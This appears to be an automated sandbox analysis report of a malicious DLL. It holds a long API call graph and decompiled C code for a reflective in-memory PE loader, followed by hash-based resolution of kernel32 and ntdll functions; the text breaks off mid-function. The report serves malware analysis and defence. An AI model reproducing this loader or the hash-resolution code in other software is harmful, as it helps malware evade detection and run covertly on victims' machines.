20614 1001c1e4 20716 1001bd03 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 20614->20716 20616 1001c1ef 20717 1001bd03 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 20616->20717 20618 1001c1ff 20718 1001bd03 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 20618->20718 20620 1001c20f 20719 1001bd03 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 20620->20719 20622 1001c21f 20720 1001a3d3 66 API calls ___crtInitCritSecAndSpinCount 20622->20720 20624 1001c22c 20625 1001c295 20624->20625 20721 1001bd6f TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 20624->20721 20724 1001be05 5 API calls __decode_pointer 20625->20724 20628 1001c240 20628->20625 20629 1001e76e __calloc_crt 66 API calls 20628->20629 20630 1001c259 20629->20630 20630->20625 20722 1001bd6f TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 20630->20722 20632 1001c273 20632->20625 20633 1001c27a 20632->20633 20723 1001be42 66 API calls 4 library calls 20633->20723 20635 1001c282 GetCurrentThreadId 20635->20610 20637 1001f648 20636->20637 20638 1001f629 GetEnvironmentStringsW 20636->20638 20639 1001f631 20637->20639 20641 1001f6e3 20637->20641 20638->20639 20640 1001f63d GetLastError 20638->20640 20643 1001f663 GetEnvironmentStringsW 20639->20643 20644 1001f672 WideCharToMultiByte 20639->20644 20640->20637 20642 1001f6eb GetEnvironmentStrings 20641->20642 20645 1001799b 20641->20645 20642->20645 20646 1001f6fb 20642->20646 20643->20644 20643->20645 20649 1001f6a6 20644->20649 20650 1001f6d8 FreeEnvironmentStringsW 20644->20650 20663 1001f055 20645->20663 20726 1001e72e 66 API calls _malloc 20646->20726 20725 1001e72e 66 API calls _malloc 20649->20725 20650->20645 20653 1001f714 20655 1001f727 20653->20655 20656 1001f71b FreeEnvironmentStringsA 20653->20656 20654 1001f6ac 20654->20650 20657 1001f6b5 WideCharToMultiByte 20654->20657 20727 10016a10 20655->20727 20656->20645 20659 1001f6cf 20657->20659 20660 1001f6c6 20657->20660 20659->20650 20662 10016380 __mtinitlocknum 66 API calls 20660->20662 20662->20659 20731 1001984c 20663->20731 20665 1001f061 GetStartupInfoA 20666 1001e76e __calloc_crt 66 API calls 20665->20666 20672 1001f082 20666->20672 20667 1001f28c __mtinitlocknum 20667->20560 20668 1001f209 GetStdHandle 20674 1001f1d3 20668->20674 20669 1001e76e __calloc_crt 66 API calls 20669->20672 20670 1001f26e SetHandleCount 20670->20667 20671 1001f21b GetFileType 20671->20674 20672->20667 20672->20669 20673 1001f156 20672->20673 20672->20674 20673->20674 20675 1001f18a 20673->20675 20676 1001f17f GetFileType 20673->20676 20674->20668 20674->20670 20674->20671 20679 1001f232 20674->20679 20675->20667 20675->20673 20732 1001febd 66 API calls 5 library calls 20675->20732 20676->20673 20676->20675 20679->20667 20679->20674 20733 1001febd 66 API calls 5 library calls 20679->20733 20680->20536 20682->20565 20683->20569 20684->20571 20685->20568 20686->20530 20687->20540 20689->20531 20693 1001e772 20690->20693 20692 10017a31 20692->20536 20692->20541 20693->20692 20694 1001e792 Sleep 20693->20694 20734 100170fe 20693->20734 20695 1001e7a7 20694->20695 20695->20692 20695->20693 20696->20548 20697->20558 20700 1001638c __mtinitlocknum 20698->20700 20699 10016405 __expand __mtinitlocknum 20699->20572 20700->20699 20710 100163cb 20700->20710 20753 1001a549 66 API calls 2 library calls 20700->20753 20701 100163e0 RtlFreeHeap 20701->20699 20703 100163f2 20701->20703 20756 10017d62 66 API calls __getptd_noexit 20703->20756 20705 100163f7 GetLastError 20705->20699 20706 100163a3 ___sbh_find_block 20707 100163bd 20706->20707 20754 1001a5ed VirtualFree VirtualFree HeapFree __shift 20706->20754 20755 100163d6 LeaveCriticalSection _doexit 20707->20755 20710->20699 20710->20701 20711->20536 20712->20597 20713->20601 20715->20614 20716->20616 20717->20618 20718->20620 20719->20622 20720->20624 20721->20628 20722->20632 20723->20635 20725->20654 20726->20653 20728 10016a28 20727->20728 20729 10016a4f __VEC_memcpy 20728->20729 20730 10016a57 FreeEnvironmentStringsA 20728->20730 20729->20730 20730->20645 20731->20665 20732->20675 20733->20679 20735 1001710a __mtinitlocknum 20734->20735 20736 10017122 20735->20736 20746 10017141 _memset 20735->20746 20747 10017d62 66 API calls __getptd_noexit 20736->20747 20738 10017127 20748 1001c596 4 API calls 2 library calls 20738->20748 20740 100171b3 RtlAllocateHeap 20740->20746 20742 10017137 __mtinitlocknum 20742->20693 20746->20740 20746->20742 20749 1001a549 66 API calls 2 library calls 20746->20749 20750 1001ad96 5 API calls 2 library calls 20746->20750 20751 100171fa LeaveCriticalSection _doexit 20746->20751 20752 1001e520 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 20746->20752 20747->20738 20749->20746 20750->20746 20751->20746 20752->20746 20753->20706 20754->20707 20755->20710 20756->20705 20758 1001703b _malloc 66 API calls 20757->20758 20760 10008870 20758->20760 20759 1000887c 20759->20576 20759->20579 20760->20759 20761 10016380 __mtinitlocknum 66 API calls 20760->20761 20761->20759 20763 100170e8 20762->20763 20775 10017049 20762->20775 20795 1001e520 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 20763->20795 20765 100170ee 20796 10017d62 66 API calls __getptd_noexit 20765->20796 20768 100170f4 20768->20588 20771 100170ac RtlAllocateHeap 20771->20775 20772 1001705e 20772->20775 20788 1001e4dd 66 API calls 2 library calls 20772->20788 20789 1001e33d 66 API calls 7 library calls 20772->20789 20790 10017df0 GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 20772->20790 20774 100170df 20774->20588 20775->20771 20775->20772 20775->20774 20776 100170d3 20775->20776 20779 100170d1 20775->20779 20791 10016fec 66 API calls 4 library calls 20775->20791 20792 1001e520 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 20775->20792 20793 10017d62 66 API calls __getptd_noexit 20776->20793 20794 10017d62 66 API calls __getptd_noexit 20779->20794 20782 1001703b _malloc 66 API calls 20781->20782 20783 10002fc0 20782->20783 20783->20590 20797 10002900 20784->20797 20787->20578 20788->20772 20789->20772 20791->20775 20792->20775 20793->20779 20794->20774 20795->20765 20796->20768 20834 10001fe0 20797->20834 20800 10002943 SetLastError 20829 10002929 ShowWindow 20800->20829 20801 10002955 20802 10001fe0 ___DllMainCRTStartup SetLastError 20801->20802 20803 1000296e 20802->20803 20804 10002990 SetLastError 20803->20804 20805 100029a2 20803->20805 20803->20829 20804->20829 20806 100029b1 SetLastError 20805->20806 20807 100029c3 20805->20807 20806->20829 20808 100029ce SetLastError 20807->20808 20812 100029e0 GetNativeSystemInfo 20807->20812 20808->20829 20810 10002a94 SetLastError 20810->20829 20811 10002aa6 VirtualAlloc 20813 10002af2 GetProcessHeap HeapAlloc 20811->20813 20814 10002ac7 VirtualAlloc 20811->20814 20812->20810 20812->20811 20816 10002b2c 20813->20816 20817 10002b0c VirtualFree SetLastError 20813->20817 20814->20813 20815 10002ae3 SetLastError 20814->20815 20815->20829 20818 10001fe0 ___DllMainCRTStartup SetLastError 20816->20818 20817->20829 20819 10002b8e 20818->20819 20820 10002b92 20819->20820 20821 10002b9c VirtualAlloc 20819->20821 20872 10002ec0 VirtualFree VirtualFree GetProcessHeap HeapFree ___DllMainCRTStartup 20820->20872 20822 10002bcb ___DllMainCRTStartup 20821->20822 20837 10002010 20822->20837 20825 10002bff ___DllMainCRTStartup 20825->20820 20847 10002670 20825->20847 20829->20578 20830 10002c68 ___DllMainCRTStartup 20830->20820 20830->20829 20866 30a6395 20830->20866 20832 10002ccf SetLastError 20832->20820 20835 10001ffb 20834->20835 20836 10001fef SetLastError 20834->20836 20835->20800 20835->20801 20835->20829 20836->20835 20838 10002040 20837->20838 20839 100020d3 20838->20839 20841 1000207c VirtualAlloc 20838->20841 20846 100020f0 ___DllMainCRTStartup 20838->20846 20840 10001fe0 ___DllMainCRTStartup SetLastError 20839->20840 20844 100020ec 20840->20844 20842 100020a0 20841->20842 20843 100020a7 ___DllMainCRTStartup 20841->20843 20842->20846 20843->20838 20845 100020f4 VirtualAlloc 20844->20845 20844->20846 20845->20846 20846->20825 20848 100026a9 IsBadReadPtr 20847->20848 20857 1000269f 20847->20857 20850 100026d3 20848->20850 20848->20857 20851 10002705 SetLastError 20850->20851 20852 10002719 20850->20852 20850->20857 20851->20857 20873 10001f00 VirtualQuery VirtualFree VirtualAlloc ___DllMainCRTStartup 20852->20873 20854 10002733 20855 1000273f SetLastError 20854->20855 20859 10002769 20854->20859 20855->20857 20857->20820 20860 10002300 20857->20860 20858 10002879 SetLastError 20858->20857 20859->20857 20859->20858 20864 10002348 ___DllMainCRTStartup 20860->20864 20861 10002451 20862 100021d0 ___DllMainCRTStartup 2 API calls 20861->20862 20863 1000242d 20862->20863 20863->20830 20864->20861 20864->20863 20874 100021d0 20864->20874 20867 30a6453 20866->20867 20868 30a647e 20866->20868 20881 30aefdd 20867->20881 20868->20829 20868->20832 20872->20829 20873->20854 20875 100021ec 20874->20875 20876 100021e2 20874->20876 20877 10002254 VirtualProtect 20875->20877 20878 100021fa 20875->20878 20876->20864 20877->20876 20878->20876 20880 10002232 VirtualFree 20878->20880 20880->20876 20891 30af548 20881->20891 20885 30af760 20905 30a85ff 20885->20905 20886 30a6466 20886->20868 20894 30ad11a 20886->20894 20889 30ae1f8 GetPEB 20889->20891 20891->20885 20891->20886 20891->20889 20892 30afecb GetPEB 20891->20892 20897 30b061d 20891->20897 20901 3091a34 20891->20901 20915 30b0db1 GetPEB 20891->20915 20916 30b2d0a GetPEB 20891->20916 20917 30afe2a 20891->20917 20921 309c307 GetPEB 20891->20921 20892->20891 20895 309eb52 GetPEB 20894->20895 20896 30ad1b1 ExitProcess 20895->20896 20896->20868 20898 30b0636 20897->20898 20922 309eb52 20898->20922 20900 30b06de lstrcmpiW 20900->20891 20902 3091a59 20901->20902 20903 309eb52 GetPEB 20902->20903 20904 3091aeb 20903->20904 20904->20891 20906 30a8626 20905->20906 20907 30afe2a GetPEB 20906->20907 20908 30a878e 20907->20908 20927 30b2c24 20908->20927 20910 30a87c7 20911 30a87d2 20910->20911 20931 30b1538 GetPEB 20910->20931 20911->20886 20913 30a87ec 20932 30b1538 GetPEB 20913->20932 20915->20891 20916->20891 20918 30afe3d 20917->20918 20933 309c28c 20918->20933 20921->20891 20923 309ebf7 20922->20923 20925 309ec06 20922->20925 20926 30a567b GetPEB 20923->20926 20925->20900 20926->20925 20928 30b2c57 20927->20928 20929 309eb52 GetPEB 20928->20929 20930 30b2ced CreateProcessW 20929->20930 20930->20910 20931->20913 20932->20911 20934 309c2a9 20933->20934 20937 30976e0 20934->20937 20938 30976f8 20937->20938 20939 309eb52 GetPEB 20938->20939 20940 3097793 20939->20940 20940->20891 20941 10013d98 20942 10013da4 __EH_prolog3 20941->20942 20944 10013df2 20942->20944 20952 10013a9b EnterCriticalSection 20942->20952 20966 1000a0db 2 API calls 4 library calls 20942->20966 20967 10013bab TlsAlloc InitializeCriticalSection 20942->20967 20968 1001398e EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 20944->20968 20948 10013dff 20949 10013e05 20948->20949 20950 10013e18 ~_Task_impl 20948->20950 20969 10013c4d 87 API calls 4 library calls 20949->20969 20957 10013aba 20952->20957 20953 10013b76 _memset 20954 10013b8a LeaveCriticalSection 20953->20954 20954->20942 20955 10013af3 20970 100134f9 20955->20970 20956 10013b08 GlobalHandle GlobalUnlock 20959 100134f9 codecvt 80 API calls 20956->20959 20957->20953 20957->20955 20957->20956 20961 10013b25 GlobalReAlloc 20959->20961 20962 10013b2f 20961->20962 20963 10013b57 GlobalLock 20962->20963 20964 10013b48 LeaveCriticalSection 20962->20964 20965 10013b3a GlobalHandle GlobalLock 20962->20965 20963->20953 20964->20963 20965->20964 20966->20942 20967->20942 20968->20948 20969->20950 20971 1001350c codecvt 20970->20971 20972 10013519 GlobalAlloc 20971->20972 20974 10001040 80 API calls 2 library calls 20971->20974 20972->20962 20974->20972

                                                                                                        Executed Functions

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 10002900-10002927 call 10001fe0 3 10002930-10002941 0->3 4 10002929-1000292b 0->4 5 10002943-10002950 SetLastError 3->5 6 10002955-10002970 call 10001fe0 3->6 7 10002d1a-10002d1d 4->7 5->7 10 10002972-10002974 6->10 11 10002979-1000298e 6->11 10->7 12 10002990-1000299d SetLastError 11->12 13 100029a2-100029af 11->13 12->7 14 100029b1-100029be SetLastError 13->14 15 100029c3-100029cc 13->15 14->7 16 100029e0-10002a01 15->16 17 100029ce-100029db SetLastError 15->17 18 10002a15-10002a1f 16->18 17->7 19 10002a21-10002a28 18->19 20 10002a57-10002a92 GetNativeSystemInfo 18->20 23 10002a38-10002a44 19->23 24 10002a2a-10002a36 19->24 21 10002a94-10002aa1 SetLastError 20->21 22 10002aa6-10002ac5 VirtualAlloc 20->22 21->7 26 10002af2-10002b0a GetProcessHeap HeapAlloc 22->26 27 10002ac7-10002ae1 VirtualAlloc 22->27 25 10002a47-10002a4d 23->25 24->25 28 10002a55 25->28 29 10002a4f-10002a52 25->29 31 10002b2c-10002b90 call 10001fe0 26->31 32 10002b0c-10002b27 VirtualFree SetLastError 26->32 27->26 30 10002ae3-10002aed SetLastError 27->30 28->18 29->28 30->7 36 10002b92 31->36 37 10002b9c-10002c01 VirtualAlloc call 10001e60 call 10002010 31->37 32->7 39 10002d0c-10002d18 call 10002ec0 36->39 45 10002c03 37->45 46 10002c0d-10002c1e 37->46 39->7 45->39 47 10002c20-10002c36 call 10002500 46->47 48 10002c38-10002c3b 46->48 50 10002c42-10002c50 call 10002670 47->50 48->50 54 10002c52 50->54 55 10002c5c-10002c6a call 10002300 50->55 54->39 58 10002c76-10002c84 call 10002480 55->58 59 10002c6c 55->59 62 10002c86 58->62 63 10002c8d-10002c96 58->63 59->39 62->39 64 10002c98-10002c9f 63->64 65 10002cfd-10002d00 63->65 67 10002ca1-10002cc3 call 30a6395 64->67 68 10002cea-10002cf8 64->68 66 10002d07-10002d0a 65->66 66->7 70 10002cc6-10002ccd 67->70 69 10002cfb 68->69 69->66 71 10002cde-10002ce8 70->71 72 10002ccf-10002cda SetLastError 70->72 71->69 72->39
                                                                                                        C-Code - Quality: 89%
                                                                                                        			E10002900(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                        				void* _v8;
                                                                                                        				void* _v12;
                                                                                                        				signed short* _v16;
                                                                                                        				void* _v20;
                                                                                                        				void* _v24;
                                                                                                        				long _v28;
                                                                                                        				signed int _v32;
                                                                                                        				intOrPtr _v64;
                                                                                                        				char _v68;
                                                                                                        				void* _v72;
                                                                                                        				intOrPtr _v76;
                                                                                                        				intOrPtr* _v80;
                                                                                                        				intOrPtr _v84;
                                                                                                        				void* _v88;
                                                                                                        				intOrPtr _v92;
                                                                                                        				intOrPtr _v96;
                                                                                                        				intOrPtr _v100;
                                                                                                        				void* _t180;
                                                                                                        				void* _t191;
                                                                                                        				void* _t198;
                                                                                                        				void* _t202;
                                                                                                        				intOrPtr _t209;
                                                                                                        				void* _t220;
                                                                                                        				intOrPtr _t269;
                                                                                                        				intOrPtr _t278;
                                                                                                        				intOrPtr _t326;
                                                                                                        
                                                                                                        				_v100 = __ecx;
                                                                                                        				_v72 = 0;
                                                                                                        				_v20 = 0;
                                                                                                        				if(E10001FE0(_v100, _a8, 0x40) != 0) {
                                                                                                        					_v16 = _a4;
                                                                                                        					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
                                                                                                        						_t10 =  &(_v16[0x1e]); // 0x47e81005
                                                                                                        						if(E10001FE0(_v100, _a8,  *_t10 + 0xf8) != 0) {
                                                                                                        							_t15 =  &(_v16[0x1e]); // 0x47e81005
                                                                                                        							_v80 = _a4 +  *_t15;
                                                                                                        							if( *_v80 == 0x4550) {
                                                                                                        								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
                                                                                                        									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
                                                                                                        										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                        										_v32 =  *(_v80 + 0x38);
                                                                                                        										_v12 = 0;
                                                                                                        										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
                                                                                                        											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
                                                                                                        												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
                                                                                                        											} else {
                                                                                                        												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
                                                                                                        											}
                                                                                                        											if(_v88 > _v20) {
                                                                                                        												_v20 = _v88;
                                                                                                        											}
                                                                                                        											_v12 = _v12 + 1;
                                                                                                        											_v84 = _v84 + 0x28;
                                                                                                        										}
                                                                                                        										__imp__GetNativeSystemInfo( &_v68); // executed
                                                                                                        										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _v64 - 0x00000001 &  !(_v64 - 1);
                                                                                                        										_t65 = _v64 - 1; // -1
                                                                                                        										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
                                                                                                        											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
                                                                                                        											_v24 = _t180;
                                                                                                        											if(_v24 != 0) {
                                                                                                        												L26:
                                                                                                        												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
                                                                                                        												if(_v72 != 0) {
                                                                                                        													 *((intOrPtr*)(_v72 + 4)) = _v24;
                                                                                                        													asm("sbb edx, edx");
                                                                                                        													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
                                                                                                        													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
                                                                                                        													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
                                                                                                        													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
                                                                                                        													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
                                                                                                        													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
                                                                                                        													if(E10001FE0(_v100, _a8,  *(_v80 + 0x54)) != 0) {
                                                                                                        														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
                                                                                                        														_v8 = _t191;
                                                                                                        														E10001E60(_v8, _v16,  *(_v80 + 0x54));
                                                                                                        														_t115 =  &(_v16[0x1e]); // 0x47e81005
                                                                                                        														 *_v72 = _v8 +  *_t115;
                                                                                                        														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
                                                                                                        														_t198 = E10002010(_v100, _a4, _a8, _v80, _v72); // executed
                                                                                                        														if(_t198 != 0) {
                                                                                                        															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
                                                                                                        															_v76 = _t269;
                                                                                                        															if(_t269 == 0) {
                                                                                                        																 *((intOrPtr*)(_v72 + 0x18)) = 1;
                                                                                                        															} else {
                                                                                                        																 *((intOrPtr*)(_v72 + 0x18)) = E10002500(_v100, _v72, _v76);
                                                                                                        															}
                                                                                                        															if(E10002670(_v100, _v72) != 0) {
                                                                                                        																_t202 = E10002300(_v100, _v72); // executed
                                                                                                        																if(_t202 != 0) {
                                                                                                        																	if(E10002480(_v100, _v72) != 0) {
                                                                                                        																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
                                                                                                        																			 *(_v72 + 0x2c) = 0;
                                                                                                        																			L49:
                                                                                                        																			return _v72;
                                                                                                        																		}
                                                                                                        																		if( *(_v72 + 0x14) == 0) {
                                                                                                        																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
                                                                                                        																			L47:
                                                                                                        																			goto L49;
                                                                                                        																		}
                                                                                                        																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
                                                                                                        																		_t209 =  *0x10058ed8; // 0x0
                                                                                                        																		_t278 =  *0x10058ed4; // 0x1
                                                                                                        																		_t326 =  *0x10058ed0; // 0x10000000
                                                                                                        																		_v92 = _v96(_t326, _t278, _t209);
                                                                                                        																		if(_v92 != 0) {
                                                                                                        																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
                                                                                                        																			goto L47;
                                                                                                        																		}
                                                                                                        																		SetLastError(0x45a);
                                                                                                        																		L50:
                                                                                                        																		E10002EC0(_v100, _v72);
                                                                                                        																		return 0;
                                                                                                        																	}
                                                                                                        																	goto L50;
                                                                                                        																}
                                                                                                        																goto L50;
                                                                                                        															}
                                                                                                        															goto L50;
                                                                                                        														}
                                                                                                        														goto L50;
                                                                                                        													}
                                                                                                        													goto L50;
                                                                                                        												}
                                                                                                        												VirtualFree(_v24, 0, 0x8000);
                                                                                                        												SetLastError(0xe);
                                                                                                        												return 0;
                                                                                                        											}
                                                                                                        											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
                                                                                                        											_v24 = _t220;
                                                                                                        											if(_v24 != 0) {
                                                                                                        												goto L26;
                                                                                                        											}
                                                                                                        											SetLastError(0xe);
                                                                                                        											return 0;
                                                                                                        										}
                                                                                                        										SetLastError(0xc1);
                                                                                                        										return 0;
                                                                                                        									}
                                                                                                        									SetLastError(0xc1);
                                                                                                        									return 0;
                                                                                                        								}
                                                                                                        								SetLastError(0xc1);
                                                                                                        								return 0;
                                                                                                        							}
                                                                                                        							SetLastError(0xc1);
                                                                                                        							return 0;
                                                                                                        						}
                                                                                                        						return 0;
                                                                                                        					}
                                                                                                        					SetLastError(0xc1);
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        				return 0;
                                                                                                        			}





























                                                                                                        0x10002906
                                                                                                        0x10002909
                                                                                                        0x10002910
                                                                                                        0x10002927
                                                                                                        0x10002933
                                                                                                        0x10002941
                                                                                                        0x10002958
                                                                                                        0x10002970
                                                                                                        0x1000297f
                                                                                                        0x10002982
                                                                                                        0x1000298e
                                                                                                        0x100029af
                                                                                                        0x100029cc
                                                                                                        0x100029ee
                                                                                                        0x100029f7
                                                                                                        0x100029fa
                                                                                                        0x10002a15
                                                                                                        0x10002a28
                                                                                                        0x10002a44
                                                                                                        0x10002a2a
                                                                                                        0x10002a33
                                                                                                        0x10002a33
                                                                                                        0x10002a4d
                                                                                                        0x10002a52
                                                                                                        0x10002a52
                                                                                                        0x10002a09
                                                                                                        0x10002a12
                                                                                                        0x10002a12
                                                                                                        0x10002a5b
                                                                                                        0x10002a78
                                                                                                        0x10002a81
                                                                                                        0x10002a92
                                                                                                        0x10002ab8
                                                                                                        0x10002abe
                                                                                                        0x10002ac5
                                                                                                        0x10002af2
                                                                                                        0x10002b03
                                                                                                        0x10002b0a
                                                                                                        0x10002b32
                                                                                                        0x10002b44
                                                                                                        0x10002b4b
                                                                                                        0x10002b54
                                                                                                        0x10002b5d
                                                                                                        0x10002b66
                                                                                                        0x10002b6f
                                                                                                        0x10002b78
                                                                                                        0x10002b90
                                                                                                        0x10002bae
                                                                                                        0x10002bb4
                                                                                                        0x10002bc6
                                                                                                        0x10002bd4
                                                                                                        0x10002bda
                                                                                                        0x10002be4
                                                                                                        0x10002bfa
                                                                                                        0x10002c01
                                                                                                        0x10002c18
                                                                                                        0x10002c1b
                                                                                                        0x10002c1e
                                                                                                        0x10002c3b
                                                                                                        0x10002c20
                                                                                                        0x10002c33
                                                                                                        0x10002c33
                                                                                                        0x10002c50
                                                                                                        0x10002c63
                                                                                                        0x10002c6a
                                                                                                        0x10002c84
                                                                                                        0x10002c96
                                                                                                        0x10002d00
                                                                                                        0x10002d07
                                                                                                        0x00000000
                                                                                                        0x10002d07
                                                                                                        0x10002c9f
                                                                                                        0x10002cf8
                                                                                                        0x10002cfb
                                                                                                        0x00000000
                                                                                                        0x10002cfb
                                                                                                        0x10002cac
                                                                                                        0x10002caf
                                                                                                        0x10002cb5
                                                                                                        0x10002cbc
                                                                                                        0x10002cc6
                                                                                                        0x10002ccd
                                                                                                        0x10002ce1
                                                                                                        0x00000000
                                                                                                        0x10002ce1
                                                                                                        0x10002cd4
                                                                                                        0x10002d0c
                                                                                                        0x10002d13
                                                                                                        0x00000000
                                                                                                        0x10002d18
                                                                                                        0x00000000
                                                                                                        0x10002c86
                                                                                                        0x00000000
                                                                                                        0x10002c6c
                                                                                                        0x00000000
                                                                                                        0x10002c52
                                                                                                        0x00000000
                                                                                                        0x10002c03
                                                                                                        0x00000000
                                                                                                        0x10002b92
                                                                                                        0x10002b17
                                                                                                        0x10002b1f
                                                                                                        0x00000000
                                                                                                        0x10002b25
                                                                                                        0x10002ad4
                                                                                                        0x10002ada
                                                                                                        0x10002ae1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10002ae5
                                                                                                        0x00000000
                                                                                                        0x10002aeb
                                                                                                        0x10002a99
                                                                                                        0x00000000
                                                                                                        0x10002a9f
                                                                                                        0x100029d3
                                                                                                        0x00000000
                                                                                                        0x100029d9
                                                                                                        0x100029b6
                                                                                                        0x00000000
                                                                                                        0x100029bc
                                                                                                        0x10002995
                                                                                                        0x00000000
                                                                                                        0x1000299b
                                                                                                        0x00000000
                                                                                                        0x10002972
                                                                                                        0x10002948
                                                                                                        0x00000000
                                                                                                        0x1000294e
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                          • Part of subcall function 10001FE0: SetLastError.KERNEL32(0000000D,?,?,10002925,10008AC6,00000040), ref: 10001FF1
                                                                                                        • SetLastError.KERNEL32(000000C1,10008AC6,00000040), ref: 10002948
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 1452528299-0
                                                                                                        • Opcode ID: 08cff93c7344199116f568f774659ccae89e30fc42bc807c3f2613e3b5310ed8
                                                                                                        • Instruction ID: 2ef2df373ea658209f5af2a718a6df98ca9e1c1927523c70ceffa034f4820264
                                                                                                        • Opcode Fuzzy Hash: 08cff93c7344199116f568f774659ccae89e30fc42bc807c3f2613e3b5310ed8
                                                                                                        • Instruction Fuzzy Hash: 01E1F874A01219EFEB04CF94C994E9EB7B2FF88384F208559E905AB399D770AD46CF50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 90%
                                                                                                        			E100088E0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                        				struct HWND__* _v8;
                                                                                                        				void* _v12;
                                                                                                        				intOrPtr _v16;
                                                                                                        				intOrPtr _v20;
                                                                                                        				intOrPtr _v24;
                                                                                                        				struct HWND__* _v28;
                                                                                                        				struct HWND__* _v32;
                                                                                                        				long _v36;
                                                                                                        				int _v40;
                                                                                                        				intOrPtr _v44;
                                                                                                        				intOrPtr _v48;
                                                                                                        				intOrPtr _v52;
                                                                                                        				intOrPtr _v56;
                                                                                                        				void* __ebp;
                                                                                                        				void* _t38;
                                                                                                        				long _t45;
                                                                                                        				long _t47;
                                                                                                        				intOrPtr _t56;
                                                                                                        				void* _t63;
                                                                                                        				intOrPtr _t68;
                                                                                                        
                                                                                                        				_t79 = __esi;
                                                                                                        				_t78 = __edi;
                                                                                                        				_t64 = __ebx;
                                                                                                        				_v56 = _a8;
                                                                                                        				 *0x10058ed0 = _a4;
                                                                                                        				_t72 = _a8;
                                                                                                        				 *0x10058ed4 = _a8;
                                                                                                        				 *0x10058ed8 = _a12;
                                                                                                        				_v8 = 0;
                                                                                                        				_v36 = 0;
                                                                                                        				_v28 = 0;
                                                                                                        				_v32 = 0;
                                                                                                        				_v12 = 0;
                                                                                                        				_t38 = E10008860(__eflags); // executed
                                                                                                        				if(_t38 != 0) {
                                                                                                        					_push(0x10029b4c);
                                                                                                        					E1001771B(__ebx, _t72, __edi, __esi, __eflags);
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        				 *0x10056f08 = 0;
                                                                                                        				 *0x10056f0c = 0;
                                                                                                        				 *0x10056f10 = 0;
                                                                                                        				 *0x10056f18 = 0;
                                                                                                        				 *0x10056f14 = 0;
                                                                                                        				_v40 = 0x44368d;
                                                                                                        				_v52 = 0x3f8fc5;
                                                                                                        				_v20 = 0x3b272b;
                                                                                                        				_v24 = 0x2feb60;
                                                                                                        				_v44 = 0xdd3c;
                                                                                                        				_v48 = 0x47c;
                                                                                                        				_v36 = 0x24e00;
                                                                                                        				_v28 = E10006170(L"kernel32.dll");
                                                                                                        				_v32 = E10006170(L"ntdll.dll");
                                                                                                        				 *0x10058eb0 = E10006D50(_v28, 0x70e66e6b);
                                                                                                        				 *0x10058eb8 = E10006D50(_v28, 0x579606ae);
                                                                                                        				_t95 =  *0x10058eb8;
                                                                                                        				if( *0x10058eb8 == 0) {
                                                                                                        					_t45 = E10017716(0x10029b18);
